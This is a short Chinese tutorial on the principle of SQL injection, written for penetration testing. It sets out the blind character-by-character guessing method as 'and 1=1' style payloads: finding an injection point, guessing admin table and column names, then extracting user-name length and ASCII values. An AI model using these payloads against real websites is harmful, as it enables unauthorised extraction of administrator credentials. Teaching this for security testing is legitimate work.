渗透测试---SQL注入~SQL注入原理-雷驰演示

OWASP TOP 10 web安全威胁：

 

SQL注入定义：

当应用程序将用户输入的内容拼接到SQL语句中一起提交给数据库执行时，就会产生SQL注入威胁。

数据库的分层：

库---表---字段---内容

Access数据库没有库的概念，直接从表开始

逐字猜解法：

1.判断有无注入点

and 1=1

and 1=2

2.猜表名(一般的表名称无非是admin,adminuser,user,pass,password等)

and (select count(*) from 表名)<>0                           <>是不等于的意思

and exists (select * from 表名)

3.猜列名

and (select count(列名) from 表名)

and exists (select 列名 from 表名)

4.判断内容长度

and (select top 1 len(user_name) from admin)=5

user_name的长度=5，正常则=5，也可以用>或者<去判断

5.截取字符串并转换为ascii码进行数值比较，判断ascii码值

and (select top 1 asc(mid(user_name,1,1))from admin)=97

判断第一位(97代表‘a’的ascii值)

and (select top 1 asc(mid(user_name,2,1))from admin)=97

判断第二位